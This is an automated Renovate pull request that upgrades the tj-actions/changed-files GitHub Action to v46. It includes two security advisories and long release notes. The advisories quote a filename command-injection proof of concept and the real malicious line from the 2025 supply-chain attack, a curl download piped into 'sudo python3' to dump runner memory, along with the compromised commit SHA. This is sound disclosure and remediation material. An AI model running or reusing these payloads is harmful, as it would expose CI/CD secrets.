Update tj-actions/changed-files action to v46 [SECURITY]

[renovate]

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package	Type	Update	Change
tj-actions/changed-files	action	major	v34 → v46

GitHub Vulnerability Alerts

CVE-2023-51664

Summary

The tj-actions/changed-files workflow allows for command injection in changed filenames, allowing an attacker to execute arbitrary code and potentially leak secrets.

Details

The changed-files action returns a list of files changed in a commit or pull request which provides an escape_json input enabled by default, only escapes " for JSON values.

This could potentially allow filenames that contain special characters such as ; and ` (backtick) which can be used by an attacker to take over the GitHub Runner if the output value is used in a raw fashion (thus being directly replaced before execution) inside a run block. By running custom commands an attacker may be able to steal secrets such as GITHUB_TOKEN if triggered on other events than pull_request. For example on push.

Proof of Concept

1. Submit a pull request to a repository with a new file injecting a command. For example $(whoami).txt which is a valid filename.
2. Upon approval of the workflow (triggered by the pull request), the action will get executed and the malicious pull request filename will flow into the List all changed files step below.

      - name: List all changed files
        run: |
          for file in $; do
            echo "$file was changed"
          done

Example output:

##[group]Run for file in $(whoami).txt; do
    for file in $(whoami).txt; do
        echo "$file was changed"
    done
shell: /usr/bin/bash -e {0}

##[endgroup]
runner.txt was changed

Impact

This issue may lead to arbitrary command execution in the GitHub Runner.

Resolution

• A new safe_output input would be enabled by default and return filename paths escaping special characters like ;, ` (backtick), $, (), etc for bash environments.

• A safe recommendation of using environment variables to store unsafe outputs.

- name: List all changed files
  env:
    ALL_CHANGED_FILES: $
  run: |
    for file in "$ALL_CHANGED_FILES"; do
      echo "$file was changed"
    done

Resources

• Keeping your GitHub Actions and workflows secure Part 2: Untrusted input
• Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests

CVE-2025-30066

Summary

A supply chain attack compromised the tj-actions/changed-files GitHub Action, impacting over 23,000 repositories. Attackers retroactively modified multiple version tags to reference a malicious commit, exposing CI/CD secrets in workflow logs. The vulnerability existed between March 14 and March 15, 2025, and has since been mitigated. This poses a significant risk of unauthorized access to sensitive information.

This has been patched in v46.0.1.

Details

The attack involved modifying the tj-actions/changed-files GitHub Action to execute a malicious Python script. This script extracted secrets from the Runner Worker process memory and printed them in GitHub Actions logs, making them publicly accessible in repositories with public workflow logs.

Key Indicators of Compromise (IoC):

• Malicious commit: 0e58ed8671d6b60d0890c21b07f8835ace038e67
• Retroactively updated tags pointing to the malicious commit:
  • v1.0.0: 0e58ed8671d6b60d0890c21b07f8835ace038e67
  • v35.7.7-sec: 0e58ed8671d6b60d0890c21b07f8835ace038e67
  • v44.5.1: 0e58ed8671d6b60d0890c21b07f8835ace038e67

Malicious Code Execution:

The malicious script downloaded and executed a Python script that scanned memory for secrets, base64-encoded them, and logged them in the build logs:

B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3`

This script targeted the Runner Worker process, extracting and exfiltrating its memory contents.

Proof of Concept (PoC)

Steps to Reproduce:

1. Create a GitHub Actions workflow using the tj-actions/changed-files action:

name: "tj-action changed-files incident"
on:
  pull_request:
    branches:
      - main
jobs:
  changed_files:
    runs-on: ubuntu-latest
    steps:
      - name: Get changed files
        id: changed-files
        uses: tj-actions/changed-files@0e58ed8671d6b60d0890c21b07f8835ace038e67

2. Run the workflow and inspect the logs in the Actions tab.
3. Vulnerable workflows may display secrets in the logs.

Detection:

Analyze network traffic using Harden-Runner, which detects unauthorized outbound requests to:

• gist.githubusercontent.com

Live reproduction logs:
🔗 Harden-Runner Insights

This attack was detected by StepSecurity when anomaly detection flagged an unauthorized outbound network call to gist.githubusercontent.com.

Duration of Vulnerability

The vulnerability was active between March 14 and March 15, 2025.

Action Required

1. Review your workflows executed between March 14 and March 15:

   • Check the changed-files section for unexpected output.
   • Decode suspicious output using the following command:

     echo 'xxx' | base64 -d | base64 -d
     

   • If the output contains sensitive information (e.g., tokens or secrets), revoke and rotate those secrets immediately.

2. Update workflows referencing the compromised commit:

   • If your workflows reference the malicious commit directly by its SHA, update them immediately to avoid using the compromised version.

3. Tagged versions:

   • If you are using tagged versions (e.g., v35, v44.5.1), no action is required as these tags have been updated and are now safe to use.

4. Rotate potentially exposed secrets:

   • As a precaution, rotate any secrets that may have been exposed during this timeframe to ensure the continued security of your workflows.

Impact

• Type of vulnerability: Supply chain attack, Secrets exposure, Information leakage
• Who is impacted:
  • Over 23,000 repositories using tj-actions/changed-files.
  • Organizations with public repositories are at the highest risk, as their logs may already be compromised.
• Potential consequences:
  • Theft of CI/CD secrets (API keys, cloud credentials, SSH keys).
  • Unauthorized access to source code, infrastructure, and production environments.
  • Credential leaks in public repositories, enabling further supply chain attacks.

---

Release Notes

tj-actions/changed-files (tj-actions/changed-files)

v46

Compare Source

🚀 Features

• Add any_added to outputs (#​2567) (c260d49) - (Jellyfrog)

➖ Remove

• Commit and push step from build job (#​2538) (be393a9) - (Tonye Jack)

🔄 Update

• Updated README.md (#​2592)

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (3dbc1e1) - (github-actions[bot])

• Updated README.md (#​2591)

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (b1ccff8) - (github-actions[bot])

• Updated README.md (#​2574)

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (050a3d3) - (github-actions[bot])

📚 Documentation

• Update link to glob patterns (#​2590) (a892f50) - (Tonye Jack)
• Add Jellyfrog as a contributor for code, and doc (#​2573) (f000a9b) - (allcontributors[bot])

🧪 Testing

• Manual triggered workflows (#​2637) (c2ca249) - (Tonye Jack)

⚙️ Miscellaneous Tasks

• deps-dev: Bump jest from 30.0.5 to 30.1.3 (#​2655) (9a67555) - (dependabot[bot])
• deps: Bump tj-actions/git-cliff from 2.1.0 to 2.2.0 (#​2660) (b67e30d) - (dependabot[bot])
• deps: Bump github/codeql-action from 3.30.2 to 3.30.3 (#​2661) (62aef42) - (dependabot[bot])
• deps: Bump github/codeql-action from 3.29.11 to 3.30.2 (#​2659) (e874f3c) - (dependabot[bot])
• deps: Bump actions/setup-node from 4.4.0 to 5.0.0 (#​2656) (8c14441) - (dependabot[bot])
• deps-dev: Bump @​types/node from 24.3.0 to 24.3.1 (#​2657) (e995ac4) - (dependabot[bot])
• deps-dev: Bump @​types/node from 24.2.1 to 24.3.0 (#​2649) (3b04099) - (dependabot[bot])
• deps: Bump github/codeql-action from 3.29.9 to 3.29.11 (#​2651) (e7b6c97) - (dependabot[bot])
• deps: Bump tj-actions/git-cliff from 2.0.2 to 2.1.0 (#​2648) (765d62b) - (dependabot[bot])
• deps: Bump github/codeql-action from 3.29.8 to 3.29.9 (#​2647) (2036da1) - (dependabot[bot])
• deps: Bump github/codeql-action from 3.29.7 to 3.29.8 (#​2644) (239aef8) - (dependabot[bot])
• deps-dev: Bump @​types/node from 24.2.0 to 24.2.1 (#​2645) (a7d5f5f) - (dependabot[bot])
• deps: Bump actions/checkout from 4.2.2 to 5.0.0 (#​2646) (5107f3a) - (dependabot[bot])
• deps-dev: Bump @​types/node from 24.1.0 to 24.2.0 (#​2640) (f963b3f) - (dependabot[bot])
• deps: Bump actions/download-artifact from 4.3.0 to 5.0.0 (#​2641) (f956744) - (dependabot[bot])
• deps: Bump yaml from 2.8.0 to 2.8.1 (#​2642) (9009bab) - (dependabot[bot])
• deps-dev: Bump eslint-plugin-prettier from 5.5.3 to 5.5.4 (#​2643) (2ecafed) - (dependabot[bot])
• deps: Bump tj-actions/eslint-changed-files from 25.3.1 to 25.3.2 (#​2638) (8cdfb76) - (dependabot[bot])
• deps-dev: Bump ts-jest from 29.4.0 to 29.4.1 (#​2639) (087c158) - (dependabot[bot])
• deps: Bump tj-actions/branch-names from 9.0.1 to 9.0.2 (#​2636) (94d97fe) - (dependabot[bot])
• deps: Bump github/codeql-action from 3.29.4 to 3.29.5 (#​2635) (18b05b9) - (dependabot[bot])
• deps: Bump tj-actions/git-cliff from 1.5.0 to 2.0.2 (#​2632) (db8d0bf) - (dependabot[bot])
• deps: Bump tj-actions/branch-names from 8.2.1 to 9.0.1 (#​2633) (0e2e8f7) - (dependabot[bot])
• deps-dev: Bump @​types/node from 24.0.15 to 24.1.0 (#​2626) (5f2e971) - (dependabot[bot])
• deps-dev: Bump jest from 30.0.4 to 30.0.5 (#​2627) (498cf3f) - (dependabot[bot])
• deps: Bump github/codeql-action from 3.29.3 to 3.29.4 (#​2628) (8378ac8) - (dependabot[bot])
• deps: Bump nrwl/nx-set-shas from 4.3.0 to 4.3.3 (#​2630) (4bfe3cb) - (dependabot[bot])
• deps: Bump github/codeql-action from 3.29.2 to 3.29.3 (#​2625) (a0370f6) - (dependabot[bot])
• deps: Bump codacy/codacy-analysis-cli-action from 4.4.5 to 4.4.7 (#​2620) (4662f28) - (dependabot[bot])
• deps-dev: Bump eslint-plugin-prettier from 5.5.1 to 5.5.3 (#​2622) (bc785e0) - (dependabot[bot])
• deps-dev: Bump @​types/node from 24.0.13 to 24.0.15 (#​2623) (2d9b737) - (dependabot[bot])
• deps-dev: Bump eslint-config-prettier from 10.1.5 to 10.1.8 (#​2624) (d22a233) - (dependabot[bot])
• deps-dev: Bump @​types/node from 24.0.12 to 24.0.13 (#​2617) (0559708) - (dependabot[bot])
• deps-dev: Bump @​types/lodash from 4.17.19 to 4.17.20 (#​2613) (5f66af5) - (dependabot[bot])
• deps-dev: Bump @​types/node from 24.0.10 to 24.0.12 (#​2616) (df49d58) - (dependabot[bot])
• deps: Bump github/codeql-action from 3.29.1 to 3.29.2 (#​2612) (cf79a64) - (dependabot[bot])
• deps-dev: Bump @​types/node from 24.0.7 to 24.0.10 (#​2614) (8dc8049) - (dependabot[bot])
• deps-dev: Bump jest from 30.0.3 to 30.0.4 (#​2615) (6118952) - (dependabot[bot])
• deps-dev: Bump eslint-plugin-prettier from 5.4.1 to 5.5.1 (#​2607) (e8772ff) - (dependabot[bot])
• deps-dev: Bump jest and @​types/jest (#​2604) (8917c3a) - (dependabot[bot])
• deps-dev: Bump @​types/lodash from 4.17.17 to 4.17.19 (#​2605) (8e3d814) - (dependabot[bot])
• deps: Bump github/codeql-action from 3.29.0 to 3.29.1 (#​2608) (6da46bc) - (dependabot[bot])
• deps-dev: Bump @​types/node from 24.0.1 to 24.0.7 (#​2609) (95dea81) - (dependabot[bot])
• deps-dev: Bump prettier from 3.5.3 to 3.6.2 (#​2610) (6b214c1) - (dependabot[bot])
• deps-dev: Bump eslint-plugin-jest from 28.13.5 to 29.0.1 (#​2600) (666c9d2) - (dependabot[bot])
• deps-dev: Bump @​types/node from 22.15.26 to 24.0.1 (#​2587) (d52d20f) - (dependabot[bot])
• deps-dev: Bump eslint-plugin-prettier from 5.4.0 to 5.4.1 (#​2578) (f1c0eb9) - (dependabot[bot])
• deps-dev: Bump eslint-plugin-jest from 28.13.0 to 28.13.3 (#​2585) (944a0f7) - (dependabot[bot])
• deps: Bump github/codeql-action from 3.28.18 to 3.29.0 (#​2588) (7a7221b) - (dependabot[bot])
• deps-dev: Bump ts-jest from 29.3.4 to 29.4.0 (#​2589) (5ca5422) - (dependabot[bot])
• deps-dev: Bump eslint-plugin-jest from 28.12.0 to 28.13.0 (#​2583) (4140eb9) - (dependabot[bot])
• deps-dev: Bump eslint-plugin-jest from 28.11.0 to 28.12.0 (#​2575) (1158705) - (dependabot[bot])
• deps-dev: Bump @​types/node from 22.15.24 to 22.15.26 (#​2576) (48aea2e) - (dependabot[bot])
• deps-dev: Bump @​types/node from 22.15.21 to 22.15.24 (#​2572) (7a9a6d2) - (dependabot[bot])
• Update build job to fail when there are uncommited changes (#​2571) (abda8aa) - (Tonye Jack)
• deps: Bump github/codeql-action from 3.28.17 to 3.28.18 (#​2564) (c6634ca) - (dependabot[bot])
• deps: Bump @​octokit/rest from 21.1.1 to 22.0.0 (#​2568) (860b02d) - (dependabot[bot])
• deps-dev: Bump @​types/node from 22.15.17 to 22.15.21 (#​2566) (3981e4f) - (dependabot[bot])
• deps-dev: Bump ts-jest from 29.3.2 to 29.3.4 (#​2563) (403a8a6) - (dependabot[bot])
• deps: Bump yaml from 2.7.1 to 2.8.0 (#​2561) (5c5e8c9) - (dependabot[bot])
• deps-dev: Bump @​types/lodash from 4.17.16 to 4.17.17 (#​2565) (d869ace) - (dependabot[bot])
• deps: Bump @​actions/github from 6.0.0 to 6.0.1 (#​2556) (480f494) - (dependabot[bot])
• deps-dev: Bump @​types/node from 22.15.14 to 22.15.17 (#​2557) (405524a) - (dependabot[bot])
• deps-dev: Bump eslint-config-prettier from 10.1.2 to 10.1.5 (#​2558) (b6970c4) - (dependabot[bot])
• deps: Bump github/codeql-action from 3.28.16 to 3.28.17 (#​2551) (11fe0a2) - (dependabot[bot])
• deps-dev: Bump @​types/node from 22.15.3 to 22.15.10 (#​2552) (e7b157b) - (dependabot[bot])
• deps-dev: Bump eslint-plugin-prettier from 5.2.6 to 5.4.0 (#​2553) (9132e03) - (dependabot[bot])
• deps-dev: Bump @​types/node from 22.15.0 to 22.15.3 (#​2548) (4168bb4) - (dependabot[bot])
• deps: Bump actions/download-artifact from 4.2.1 to 4.3.0 (#​2545) (5426ecc) - (dependabot[bot])
• deps-dev: Bump @​types/node from 22.14.1 to 22.15.0 (#​2544) (513a44e) - (dependabot[bot])
• deps: Bump github/codeql-action from 3.28.15 to 3.28.16 (#​2542) (46e217d) - (dependabot[bot])
• deps: Bump actions/setup-node from 4.3.0 to 4.4.0 (#​2539) (c34c1c1) - (dependabot[bot])
• deps-dev: Bump ts-jest from 29.3.1 to 29.3.2 (#​2536) (52c3beb) - (dependabot[bot])
• deps-dev: Bump @​types/node from 22.14.0 to 22.14.1 (#​2537) (ea3010b) - (dependabot[bot])
• deps: Bump tj-actions/branch-names from 8.1.0 to 8.2.1 (#​2535) (9b4bb2b) - (dependabot[bot])
• deps-dev: Bump eslint-config-prettier from 10.1.1 to 10.1.2 (#​2532) (9934ab3) - (dependabot[bot])

⬆️ Upgrades

• To node24 (#​2662) (24d32ff) - (Tonye Jack)
• Upgraded to v46.0.5 (#​2531)

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@​users.noreply.github.com> (db731a1) - (github-actions[bot])

v45

Compare Source

🐛 Bug Fixes

• deps: Update dependency @​octokit/rest to v21.1.1 (#​2435) (fb8dcda) - (renovate[bot])
• deps: Update dependency @​octokit/rest to v21.1.0 (#​2394) (7b72c97) - (renovate[bot])
• deps: Update dependency yaml to v2.7.0 (#​2383) (5f974c2) - (renovate[bot])

⚙️ Miscellaneous Tasks

• deps: Lock file maintenance (#​2460) (9200e69) - (renovate[bot])
• deps: Update dependency @​types/node to v22.13.10 (#​2459) (e650cfd) - (renovate[bot])
• deps: Update dependency eslint-config-prettier to v10.1.1 (#​2458) (82af21f) - (renovate[bot])
• deps: Update dependency eslint-config-prettier to v10.1.0 (#​2457) (82fa4a6) - (renovate[bot])
• deps: Update peter-evans/create-pull-request action to v7.0.8 (#​2455) (315505a) - (renovate[bot])
• deps: Update dependency @​types/node to v22.13.9 (#​2454) (c8e1cdb) - (renovate[bot])
• deps: Update dependency prettier to v3.5.3 (#​2453) (bb6d1aa) - (renovate[bot])
• deps: Lock file maintenance (#​2451) (1f74fc9) - (renovate[bot])
• deps: Update dependency @​types/node to v22.13.8 (#​2450) (6f0fde1) - (renovate[bot])
• deps: Update dependency @​types/lodash to v4.17.16 (#​2449) (056cdb7) - (renovate[bot])
• deps: Update dependency @​types/node to v22.13.7 (#​2448) (4bc8595) - (renovate[bot])
• deps: Update dependency typescript to v5.8.2 (#​2446) (86d954f) - (renovate[bot])
• deps: Update dependency eslint-config-prettier to v10.0.2 (#​2444) (33dce23) - (renovate[bot])
• deps: Update peter-evans/create-pull-request action to v7.0.7 (#​2443) (422be01) - (renovate[bot])
• deps: Lock file maintenance (#​2442) (601adb1) - (renovate[bot])
• deps: Update dependency ts-jest to v29.2.6 (#​2441) (09f0e69) - (renovate[bot])
• deps: Update dependency prettier to v3.5.2 (#​2440) (c7e81c8) - (renovate[bot])
• deps: Update dependency @​types/node to v22.13.5 (#​2439) (02e0175) - (renovate[bot])
• deps: Lock file maintenance (#​2436) (251f07e) - (renovate[bot])
• deps: Update dependency @​types/node to v22.13.4 (#​2434) (6fe3586) - (renovate[bot])
• deps: Update dependency prettier to v3.5.1 (#​2433) (df76a83) - (renovate[bot])
• deps: Update dependency @​types/node to v22.13.2 (#​2432) (faaeb86) - (renovate[bot])
• deps: Lock file maintenance (#​2429) (4919c5a) - (renovate[bot])
• deps: Update dependency prettier to v3.5.0 (#​2428) (045c541) - (renovate[bot])
• deps: Lock file maintenance (#​2426) (563041e) - (renovate[bot])
• config: Migrate renovate config (#​2427) (809f04b) - (renovate[bot])
• deps: Update dependency eslint-plugin-github to v5.1.8 (#​2424) (dcc7a0c) - (renovate[bot])
• deps: Update dependency @​types/node to v22.13.1 (#​2422) (364748a) - (renovate[bot])
• deps: Lock file maintenance (#​2420) (301bed6) - (renovate[bot])
• deps: Update dependency @​types/node to v22.13.0 (#​2419) (be1c470) - (renovate[bot])
• deps: Update dependency eslint-plugin-github to v5.1.7 (#​2417) (81785a6) - (renovate[bot])
• deps: Update dependency @​types/lodash to v4.17.15 (#​2415) (065e671) - (renovate[bot])
• deps: Update dependency @​types/node to v22.12.0 (#​2414) (45cd7f3) - (renovate[bot])
• deps: Update dependency eslint-plugin-github to v5.1.6 (#​2413) (47f21ba) - (renovate[bot])
• deps: Update actions/setup-node action to v4.2.0 (#​2411) (3b30412) - (renovate[bot])
• deps: Lock file maintenance (#​2410) (eec6665) - (renovate[bot])
• deps: Update dependency @​types/node to v22.10.10 (#​2409) (cefd9aa) - (renovate[bot])
• deps: Update dependency @​types/node to v22.10.9 (#​2408) (6296564) - (renovate[bot])
• deps: Update dependency @​types/node to v22.10.8 (#​2407) (203f0af) - (renovate[bot])
• deps: Lock file maintenance (#​2406) (8b82442) - (renovate[bot])
• deps: Update dependency eslint-plugin-prettier to v5.2.3 (#​2405) (2b7a1ec) - (renovate[bot])
• deps: Update dependency @​types/node to v22.10.7 (#​2403) (a2600ce) - (renovate[bot])
• deps: Update dependency eslint-plugin-jest to v28.11.0 (#​2400) (5dc51d3) - (renovate[bot])
• deps: Update dependency eslint-plugin-prettier to v5.2.2 (#​2399) (18de9f3) - (renovate[bot])
• deps: Update dependency @​types/node to v22.10.6 (#​2397) (467e548) - (renovate[bot])
• deps: Update dependency eslint-config-prettier to v10 (#​2396) (556e62a) - (renovate[bot])
• deps: Lock file maintenance (#​2395) (4f1e6b0) - (renovate[bot])
• deps: Update dependency typescript to v5.7.3 (#​2393) (82deec7) - (renovate[bot])
• deps: Update dependency eslint-plugin-github to v5.1.5 (#​2392) (ef7202d) - (renovate[bot])
• deps: Lock file maintenance (#​2390) (01c978c) - (renovate[bot])
• deps: Update dependency @​types/lodash to v4.17.14 (#​2388) (d6e91a2) - (renovate[bot])
• deps: Update dependency @​types/node to v22.10.5 (#​2387) (73401cd) - (renovate[bot])
• deps: Update dependency @​types/node to v22.10.4 (#​2386) (7f28b2b) - (renovate[bot])
• deps: Update dependency @​types/node to v22.10.3 (#​2385) (c1f82ce) - (renovate[bot])
• deps: Lock file maintenance (#​2382) (bb364ec) - (renovate[bot])
• deps: Update peter-evans/create-pull-request action to v7.0.6 (#​2380) (7ac5902) - (renovate[bot])
• deps: Lock file maintenance (#​2379) (7c5097f) - (renovate[bot])
• deps: Update dependency eslint-plugin-jest to v28.10.0 (#​2378) (37dc9a5) - (renovate[bot])
• deps: Lock file maintenance (#​2377) (515a6b3) - (renovate[bot])
• deps: Update dependency @​types/node to v22.10.2 (#​2376) (ac47125) - (renovate[bot])
• deps: Lock file maintenance (#​2375) (ef3b6f1) - (renovate[bot])
• deps: Update dependency eslint-plugin-github to v5.1.4 (#​2372) (bab30c2) - (renovate[bot])
• deps: Update dependency prettier to v3.4.2 (#​2370) (657a3f9) - (renovate[bot])
• deps: Lock file maintenance (#​2369) (05f0aba) - (renovate[bot])
• deps: Update dependency @​types/node to v22.10.1 (#​2368) (4623961) - (renovate[bot])
• deps: Update dependency eslint-plugin-github to v5.1.3 (#​2367) (c19a7eb) - (renovate[bot])
• deps: Update dependency prettier to v3.4.1 (#​2366) (c288441) - (renovate[bot])
• deps: Update dependency prettier to v3.4.0 (#​2365) (1d6ea46) - (renovate[bot])
• deps: Update dependency @​types/node to v22.10.0 (#​2364) (02b41f5) - (renovate[bot])
• deps: Update dependency @​types/node to v22.9.4 (#​2361) (b4a4dca) - (renovate[bot])
• deps: Lock file maintenance (#​2360) (602aacf) - (renovate[bot])
• deps: Update dependency @​types/node to v22.9.3 (#​2359) (51290e0) - (renovate[bot])
• deps: Update dependency @​types/node to v22.9.2 (#​2358) (b4badd8) - (renovate[bot])
• deps: Update dependency typescript to v5.7.2 (#​2357) (652b4c0) - (renovate[bot])
• deps-dev: Bump eslint-plugin-github from 5.0.2 to 5.1.1 (#​2356) (0b7a421) - (dependabot[bot])
• deps: Bump yaml from 2.6.0 to 2.6.1 (#​2353) (b26581a) - (dependabot[bot])
• deps: Update dependency @​types/node to v22.9.1 (#​2352) (43e6b45) - (renovate[bot])
• deps: Lock file maintenance (#​2349) (fe1bc0e) - (renovate[bot])
• deps: Update dependency @​vercel/ncc to v0.38.3 (#​2348) (d7917c6) - (renovate[bot])
• deps: Lock

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.